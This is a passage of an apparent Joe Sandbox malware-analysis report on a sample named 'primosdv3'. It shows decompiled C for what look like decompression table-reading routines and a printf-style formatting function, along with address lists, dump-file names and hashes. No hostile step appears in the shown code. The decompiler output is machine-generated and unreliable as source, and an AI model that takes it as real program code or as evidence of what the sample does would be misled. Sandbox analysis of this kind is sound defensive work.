											__eflags = _t157 - _t184;
											_t167 = _t186;
											if(_t157 != _t184) {
												_t198 = (E00C6A898(_t167) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00C6A898(_t167) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t121);
											E00C6A881(_t186, _t121);
											__eflags = _t140;
											if(_t140 == 0) {
												goto L47;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
													_t140 = _t140 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
										_t140 = _t140 + 1;
										goto L45;
									}
									_t170 = 4 + _t94 * 4 + _t190;
									__eflags = _t170;
									while(1) {
										__eflags = _t181 -  *_t170;
										if(_t181 <  *_t170) {
											break;
										}
										_t94 = _t94 + 1;
										_t170 = _t170 + 4;
										__eflags = _t94 - 0xf;
										if(_t94 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t94;
									goto L27;
								}
								_t171 = 0x10;
								_t185 = _t181 >> _t171 - _t93;
								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
								 *_t186 =  *_t186 + (_t174 >> 3);
								 *(_t186 + 4) = _t174 & 0x00000007;
								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
								goto L28;
							}
							_t130 = E00C74DC4(_t187);
							__eflags = _t130;
							if(_t130 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t140 - 0x194;
						} while (_t140 < 0x194);
						L46:
						 *((char*)(_t187 + 0xe661)) = 1;
						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
							_push(0x12b);
							_push(_t187 + 0xa0);
							_push(_t201 + 0x30);
							E00C73797();
							_push(0x3c);
							_push(_t187 + 0xf8c);
							_push(_t201 + 0x15b);
							E00C73797();
							_push(0x11);
							_push(_t187 + 0x1e78);
							_push(_t201 + 0x197);
							E00C73797();
							_push(0x1c);
							_push(_t187 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00C73797();
							E00C80320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
							return 1;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
					return E00C72F75(_t179, _t205, _t187, _t187 + 0xe4c4);
				} else {
					L47:
					return 0;
				}
			}

0x00c74088
0x00c74091
0x00c7409a
0x00c740a2
0x00c740bc
0x00c740c3
0x00c740c8
0x00c740cd
0x00c740f1
0x00c740f3
0x00c740f9
0x00c740ff
0x00c74105
0x00c7410a
0x00c74119
0x00c7411e
0x00c7411e
0x00c74125
0x00c7412a
0x00c74138
0x00c7413c
0x00c74141
0x00c74145
0x00c74147
0x00c74180
0x00000000
0x00c74180
0x00c74157
0x00c7415a
0x00c7415f
0x00c74161
0x00c7416a
0x00c7416a
0x00c7416d
0x00c7416d
0x00c7416e
0x00c74171
0x00000000
0x00000000
0x00c74173
0x00c74178
0x00c74179
0x00c7417b
0x00000000
0x00000000
0x00000000
0x00c7417b
0x00c7417d
0x00000000
0x00c7417d
0x00c74163
0x00c74184
0x00c74184
0x00c74185
0x00c74185
0x00c7418a
0x00c7418c
0x00c74194
0x00c74199
0x00c7419a
0x00c7419f
0x00c7419f
0x00c741a1
0x00c741aa
0x00c741ac
0x00c741bd
0x00c741bf
0x00c741c6
0x00c741cc
0x00c741d2
0x00c741d6
0x00c74203
0x00c74204
0x00c74205
0x00c74209
0x00c7420b
0x00c74229
0x00c7422c
0x00c74238
0x00c7423a
0x00c7423e
0x00c74243
0x00c74250
0x00c74252
0x00c74255
0x00c74257
0x00c74257
0x00c74259
0x00c74261
0x00c74263
0x00c74264
0x00c74267
0x00c74280
0x00c74281
0x00c74284
0x00c742d2
0x00c742d4
0x00c742f1
0x00c742f1
0x00c742f4
0x00c742d6
0x00c742e0
0x00c742e3
0x00c742e3
0x00c742f6
0x00c742fa
0x00c742ff
0x00c742ff
0x00c74300
0x00c74306
0x00000000
0x00000000
0x00c74308
0x00c7430d
0x00c7430e
0x00c74310
0x00000000
0x00000000
0x00c74312
0x00c74312
0x00000000
0x00c74312
0x00000000
0x00c742ff
0x00c74286
0x00c74289
0x00c7428b
0x00c742a8
0x00c742a8
0x00c742ab
0x00c7428d
0x00c74297
0x00c7429a
0x00c7429a
0x00c742ad
0x00c742b1
0x00c742b6
0x00c742b8
0x00000000
0x00c742ba
0x00c742ba
0x00c742ba
0x00c742bb
0x00c742c1
0x00000000
0x00000000
0x00c742c7
0x00c742cb
0x00c742cc
0x00c742ce
0x00000000
0x00000000
0x00000000
0x00c742d0
0x00000000
0x00c742ba
0x00c742b8
0x00c74274
0x00c74278
0x00000000
0x00c74278
0x00c74214
0x00c74214
0x00c74216
0x00c74216
0x00c74218
0x00000000
0x00000000
0x00c7421a
0x00c7421b
0x00c7421e
0x00c74221
0x00000000
0x00000000
0x00000000
0x00c74223
0x00c74225
0x00000000
0x00c74225
0x00c741da
0x00c741dd
0x00c741e7
0x00c741ef
0x00c741f4
0x00c741f7
0x00000000
0x00c741f7
0x00c741b0
0x00c741b5
0x00c741b7
0x00000000
0x00000000
0x00000000
0x00c74318
0x00c74318
0x00c74318
0x00c74324
0x00c74326
0x00c7432d
0x00c74333
0x00c74339
0x00c74346
0x00c7434b
0x00c7434c
0x00c74351
0x00c7435b
0x00c74363
0x00c74364
0x00c74369
0x00c74373
0x00c7437b
0x00c7437c
0x00c74381
0x00c7438b
0x00c74393
0x00c74394
0x00c743aa
0x00000000
0x00c743b2
0x00000000
0x00c74333
0x00c740d5
0x00000000
0x00c74335
0x00c74335
0x00000000
0x00c74335

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: b4fd6394cbcca8eb72c5135a75ef7e7580dd29770aa39338bae8559ee581ef5c
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: ED9177B02003458BDB2CEE64D890BBE77D5EB64300F50892DF5AE872C2DB349645D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C743BF Relevance: .2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00C743BF(void* __ecx) {
				signed int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				char _t90;
				signed int _t94;
				void* _t97;
				signed int _t108;
				unsigned int _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t124;
				signed int _t127;
				signed int _t128;
				signed int _t134;
				signed int _t136;
				void* _t138;
				signed int _t141;
				void* _t142;
				intOrPtr* _t143;
				void* _t147;
				intOrPtr* _t153;
				intOrPtr* _t156;
				void* _t157;
				signed int _t160;
				unsigned int _t165;
				void* _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t175;
				void* _t177;
				void* _t178;

				_t177 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
					__eflags =  *((char*)(_t175 + 8));
					if( *((char*)(_t175 + 8)) != 0) {
						L5:
						_t171 = 0;
						__eflags = 0;
						do {
							_t112 = E00C6A898(_t175) >> 0xc;
							E00C6A881(_t175, 4);
							__eflags = _t112 - 0xf;
							if(_t112 != 0xf) {
								 *(_t178 + _t171 + 0x18) = _t112;
								goto L14;
							}
							_t127 = E00C6A898(_t175) >> 0x0000000c & 0x000000ff;
							E00C6A881(_t175, 4);
							__eflags = _t127;
							if(_t127 != 0) {
								_t128 = _t127 + 2;
								__eflags = _t128;
								while(1) {
									_t128 = _t128 - 1;
									__eflags = _t171 - 0x14;
									if(_t171 >= 0x14) {
										break;
									}
									 *(_t178 + _t171 + 0x18) = 0;
									_t171 = _t171 + 1;
									__eflags = _t128;
									if(_t128 != 0) {
										continue;
									}
									break;
								}
								_t171 = _t171 - 1;
								goto L14;
							}
							 *(_t178 + _t171 + 0x18) = 0xf;
							L14:
							_t171 = _t171 + 1;
							__eflags = _t171 - 0x14;
						} while (_t171 < 0x14);
						_push(0x14);
						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
						_push(_t114);
						_push(_t178 + 0x18);
						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
						E00C73797();
						_t172 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t175 + 8));
							if( *((char*)(_t175 + 8)) != 0) {
								L19:
								_t70 = E00C6A89D(_t175);
								_t71 =  *(_t114 + 0x84);
								_t165 = _t70 & 0x0000fffe;
								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
									_t134 = 0xf;
									_t72 = _t71 + 1;
									 *(_t178 + 0x10) = _t134;
									__eflags = _t72 - _t134;
									if(_t72 >= _t134) {
										L27:
										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
										 *_t175 =  *_t175 + (_t136 >> 3);
										_t75 =  *(_t178 + 0x10);
										 *(_t175 + 4) = _t136 & 0x00000007;
										_t138 = 0x10;
										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
										__eflags = _t141 -  *_t114;
										asm("sbb eax, eax");
										_t76 = _t75 & _t141;
										__eflags = _t76;
										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
										L28:
										_t142 = 0x10;
										__eflags = _t77 - _t142;
										if(_t77 >= _t142) {
											_t168 = 0x12;
											__eflags = _t77 - _t168;
											if(__eflags >= 0) {
												_t143 = _t175;
												if(__eflags != 0) {
													_t117 = (E00C6A898(_t143) >> 9) + 0xb;
													__eflags = _t117;
													_push(7);
												} else {
													_t117 = (E00C6A898(_t143) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t79);
												E00C6A881(_t175, _t79);
												while(1) {
													_t117 = _t117 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) = 0;
													_t172 = _t172 + 1;
													__eflags = _t117;
													if(_t117 != 0) {
														continue;
													}
													L44:
													_t114 =  *((intOrPtr*)(_t178 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t77 - _t142;
											_t153 = _t175;
											if(_t77 != _t142) {
												_t124 = (E00C6A898(_t153) >> 9) + 0xb;
												__eflags = _t124;
												_push(7);
											} else {
												_t124 = (E00C6A898(_t153) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t97);
											E00C6A881(_t175, _t97);
											__eflags = _t172;
											if(_t172 == 0) {
												L48:
												_t90 = 0;
												L50:
												return _t90;
											} else {
												while(1) {
													_t124 = _t124 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
													_t172 = _t172 + 1;
													__eflags = _t124;
													if(_t124 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t178 + _t172 + 0x2c) = _t77;
										_t172 = _t172 + 1;
										goto L45;
									}
									_t156 = _t114 + (_t72 + 1) * 4;
									while(1) {
										__eflags = _t165 -  *_t156;
										if(_t165 <  *_t156) {
											break;
										}
										_t72 = _t72 + 1;
										_t156 = _t156 + 4;
										__eflags = _t72 - 0xf;
										if(_t72 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t178 + 0x10) = _t72;
									goto L27;
								}
								_t157 = 0x10;
								_t169 = _t165 >> _t157 - _t71;
								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
								 *_t175 =  *_t175 + (_t160 >> 3);
								 *(_t175 + 4) = _t160 & 0x00000007;
								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00C74E52(_t177);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t172 - 0x1ae;
						} while (_t172 < 0x1ae);
						L46:
						 *((char*)(_t177 + 0xe662)) = 1;
						__eflags =  *((char*)(_t175 + 8));
						if( *((char*)(_t175 + 8)) != 0) {
							L49:
							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
							_push(0x132);
							_push(_t118);
							_push(_t178 + 0x2c);
							E00C73797();
							_push(0x40);
							_push(_t118 + 0xeec);
							_push(_t178 + 0x166);
							E00C73797();
							_t147 = 0x10;
							_push(_t147);
							_push(_t118 + 0x1dd8);
							_push(_t178 + 0x1a6);
							E00C73797();
							_push(0x2c);
							_push(_t118 + 0x2cc4);
							_push(_t178 + 0x1b6);
							E00C73797();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t108 = E00C74E52(__ecx);
					__eflags = _t108;
					if(_t108 == 0) {
						goto L48;
					}
					goto L5;
				}
				return 1;
			}

0x00c743ce
0x00c743d0
0x00c743db
0x00c743e3
0x00c743e7
0x00c74403
0x00c74403
0x00c74403
0x00c74405
0x00c74412
0x00c74415
0x00c7441a
0x00c7441d
0x00c74456
0x00000000
0x00c74456
0x00c7442d
0x00c74430
0x00c74435
0x00c74437
0x00c74440
0x00c74440
0x00c74443
0x00c74443
0x00c74444
0x00c74447
0x00000000
0x00000000
0x00c74449
0x00c7444e
0x00c7444f
0x00c74451
0x00000000
0x00000000
0x00000000
0x00c74451
0x00c74453
0x00000000
0x00c74453
0x00c74439
0x00c7445a
0x00c7445a
0x00c7445b
0x00c7445b
0x00c7446b
0x00c7446d
0x00c74475
0x00c74476
0x00c74477
0x00c7447b
0x00c74480
0x00c74480
0x00c74482
0x00c74482
0x00c74486
0x00c744a4
0x00c744a6
0x00c744ad
0x00c744b3
0x00c744b9
0x00c744bd
0x00c744ea
0x00c744eb
0x00c744ec
0x00c744f0
0x00c744f2
0x00c7450d
0x00c74510
0x00c7451c
0x00c7451e
0x00c74522
0x00c74527
0x00c74533
0x00c74535
0x00c74537
0x00c74539
0x00c74539
0x00c7453b
0x00c74543
0x00c74545
0x00c74546
0x00c74549
0x00c74557
0x00c74558
0x00c7455b
0x00c745a9
0x00c745ab
0x00c745c8
0x00c745c8
0x00c745cb
0x00c745ad
0x00c745b7
0x00c745ba
0x00c745ba
0x00c745cd
0x00c745d1
0x00c745d6
0x00c745d6
0x00c745d7
0x00c745dd
0x00000000
0x00000000
0x00c745df
0x00c745e4
0x00c745e5
0x00c745e7
0x00000000
0x00000000
0x00c745e9
0x00c745e9
0x00000000
0x00c745e9
0x00000000
0x00c745d6
0x00c7455d
0x00c74560
0x00c74562
0x00c7457f
0x00c7457f
0x00c74582
0x00c74564
0x00c7456e
0x00c74571
0x00c74571
0x00c74584
0x00c74588
0x00c7458d
0x00c7458f
0x00c74610
0x00c74610
0x00c74679
0x00000000
0x00c74591
0x00c74591
0x00c74591
0x00c74592
0x00c74598
0x00000000
0x00000000
0x00c7459e
0x00c745a2
0x00c745a3
0x00c745a5
0x00000000
0x00000000
0x00000000
0x00c745a7
0x00000000
0x00c74591
0x00c7458f
0x00c7454b
0x00c7454f
0x00000000
0x00c7454f
0x00c744f7
0x00c744fa
0x00c744fa
0x00c744fc
0x00000000
0x00000000
0x00c744fe
0x00c744ff
0x00c74502
0x00c74505
0x00000000
0x00000000
0x00000000
0x00c74507
0x00c74509
0x00000000
0x00c74509
0x00c744c1
0x00c744c4
0x00c744ce
0x00c744d6
0x00c744db
0x00c744de
0x00000000
0x00c744de
0x00c74491
0x00c74493
0x00000000
0x00000000
0x00c74497
0x00c7449c
0x00c7449e
0x00000000
0x00000000
0x00000000
0x00c745ed
0x00c745ed
0x00c745ed
0x00c745f9
0x00c745f9
0x00c74600
0x00c74604
0x00c74614
0x00c74614
0x00c7461f
0x00c74624
0x00c74625
0x00c74628
0x00c7462d
0x00c74637
0x00c7463f
0x00c74640
0x00c74647
0x00c74648
0x00c74651
0x00c74659
0x00c7465a
0x00c7465f
0x00c74667
0x00c7466f
0x00c74672
0x00c74677
0x00000000
0x00c74677
0x00c74608
0x00c7460e
0x00000000
0x00000000
0x00000000
0x00c7460e
0x00c743f2
0x00c743f4
0x00000000
0x00000000
0x00c743f6
0x00c743fb
0x00c743fd
0x00000000
0x00000000
0x00000000
0x00c743fd
0x00000000

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 908994c84c3d5bce5c3b530061f98a94e0916eb17b903b737bfdc9f836700d8e
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 7C8138713043468BDB3DDF68C8D1BBD77D4AB95304F00892DF99E8B282DB708A869756

Uniqueness

Uniqueness Score: -1.00%

Function 00C851C9 Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 84%

			E00C851C9(void* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				void* _t103;
				signed int _t109;
				unsigned int _t111;
				signed char _t113;
				unsigned int _t121;
				void* _t122;
				signed int _t123;
				short _t124;
				void* _t127;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t122 = __edi;
				_t52 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t52 ^ _t130;
				_t129 = __ecx;
				_t101 = 0;
				_t121 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t103 = 0x58;
				_t133 = _t54 - 0x64;
				if(_t133 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00C85BFB(_t129);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
									L71:
									_t57 = 1;
									L72:
									return E00C7FBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
								}
								_t121 =  *(_t129 + 0x20);
								_push(_t122);
								_v16 = _t101;
								_t60 = _t121 >> 4;
								_v12 = _t101;
								_t123 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
									__eflags = _t109 - 0x78;
									if(_t109 == 0x78) {
										L48:
										_t62 = _t121 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t109 - 0x61;
											if(_t109 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t124 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
													__eflags = _t109 - _t65;
													if(_t109 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t101 = _t101 + 2;
														__eflags = _t101;
														L62:
														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
														__eflags = _t121 & 0x0000000c;
														if((_t121 & 0x0000000c) == 0) {
															E00C84490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
															_t131 = _t131 + 0x10;
														}
														E00C85F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
														_t111 =  *(_t129 + 0x20);
														_t101 = _t129 + 0x18;
														_t75 = _t111 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t113 = _t111 >> 2;
															__eflags = _t113 & 0x00000001;
															if((_t113 & 0x00000001) == 0) {
																E00C84490(_t129 + 0x448, 0x30, _t127, _t101);
																_t131 = _t131 + 0x10;
															}
														}
														E00C85DF8(_t129, 0);
														__eflags =  *_t101;
														if( *_t101 >= 0) {
															_t78 =  *(_t129 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00C84490(_t129 + 0x448, 0x20, _t127, _t101);
															}
														}
														_pop(_t122);
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t109 - _t86;
													if(_t109 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t128 = 0x41;
											__eflags = _t109 - _t128;
											if(_t109 == _t128) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t109 - _t88;
									if(_t109 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t121 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t121;
									if((1 & _t121) == 0) {
										_t92 = _t121 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t123;
										L45:
										_t101 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t101);
							_push(0xa);
							L29:
							_t56 = E00C85993(_t129, _t122, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00C85B70(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00C856F9(_t101, _t129);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t129 + 0x20;
						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00C85ADD(__ecx, _t121);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00C85B51(__ecx);
					goto L10;
				}
				if(_t133 == 0) {
					goto L27;
				}
				_t134 = _t54 - _t103;
				if(_t134 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00C8553C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00C858FB(_t129, __eflags, _t101);
					goto L10;
				}
				if(_t134 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t121) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00c851c9
0x00c851d1
0x00c851d8
0x00c851dd
0x00c851df
0x00c851e3
0x00c851e6
0x00c851ea
0x00c851eb
0x00c851ee
0x00c8525b
0x00c8525e
0x00c852ad
0x00c852ad
0x00c852b0
0x00c8521c
0x00c8521e
0x00c85223
0x00c85225
0x00c852cb
0x00c852ce
0x00c85414
0x00c85414
0x00c85416
0x00c85425
0x00c85425
0x00c852d4
0x00c852d9
0x00c852dc
0x00c852df
0x00c852e3
0x00c852e9
0x00c852ea
0x00c852ec
0x00c85316
0x00c85316
0x00c8531a
0x00c8531d
0x00c85327
0x00c85329
0x00c8532c
0x00c8532e
0x00c85334
0x00c85334
0x00c85336
0x00c85336
0x00c85339
0x00c85347
0x00c85347
0x00c85349
0x00c8534b
0x00c8534c
0x00c8534e
0x00c85354
0x00c85356
0x00c85357
0x00c8535c
0x00c8535f
0x00c8536d
0x00c8536d
0x00c8536f
0x00c8536f
0x00c8537a
0x00c8537c
0x00c85381
0x00c85381
0x00c85384
0x00c8538a
0x00c8538c
0x00c8538f
0x00c8539f
0x00c853a4
0x00c853a4
0x00c853b9
0x00c853be
0x00c853c1
0x00c853c6
0x00c853c9
0x00c853cb
0x00c853cd
0x00c853d0
0x00c853d3
0x00c853e0
0x00c853e5
0x00c853e5
0x00c853d3
0x00c853ec
0x00c853f1
0x00c853f4
0x00c853f9
0x00c853fc
0x00c853fe
0x00c8540b
0x00c85410
0x00c853fe
0x00c85413
0x00000000
0x00c85413
0x00c85363
0x00c85364
0x00c85367
0x00000000
0x00000000
0x00c85369
0x00000000
0x00c85369
0x00c85350
0x00c85352
0x00000000
0x00000000
0x00000000
0x00c85352
0x00c8533d
0x00c8533e
0x00c85341
0x00000000
0x00000000
0x00c85343
0x00000000
0x00c85343
0x00000000
0x00c85330
0x00c85321
0x00c85322
0x00c85325
0x00000000
0x00000000
0x00000000
0x00c85325
0x00c852f0
0x00c852f3
0x00c852f5
0x00c85300
0x00c85302
0x00c8530a
0x00c8530c
0x00c8530e
0x00000000
0x00000000
0x00c85310
0x00c85314
0x00c85314
0x00000000
0x00c85314
0x00c85304
0x00c852f9
0x00c852f9
0x00c852fa
0x00000000
0x00c852fa
0x00c852f7
0x00000000
0x00c852f7
0x00c8522b
0x00c8522b
0x00000000
0x00c8522b
0x00c852b7
0x00c852b7
0x00c852ba
0x00c8528c
0x00c8528c
0x00c8528d
0x00c8528f
0x00c85291
0x00000000
0x00c85291
0x00c852bc
0x00c852bf
0x00000000
0x00000000
0x00c852c5
0x00c85234
0x00c85234
0x00000000
0x00c85234
0x00c85260
0x00c852a3
0x00000000
0x00c852a3
0x00c85262
0x00c85265
0x00c85298
0x00c8529a
0x00000000
0x00c8529a
0x00c85267
0x00c8526a
0x00c85288
0x00c85288
0x00c85288
0x00c85288
0x00000000
0x00c85288
0x00c8526c
0x00c8526f
0x00c85281
0x00000000
0x00c85281
0x00c85271
0x00c85274
0x00000000
0x00000000
0x00c85278
0x00000000
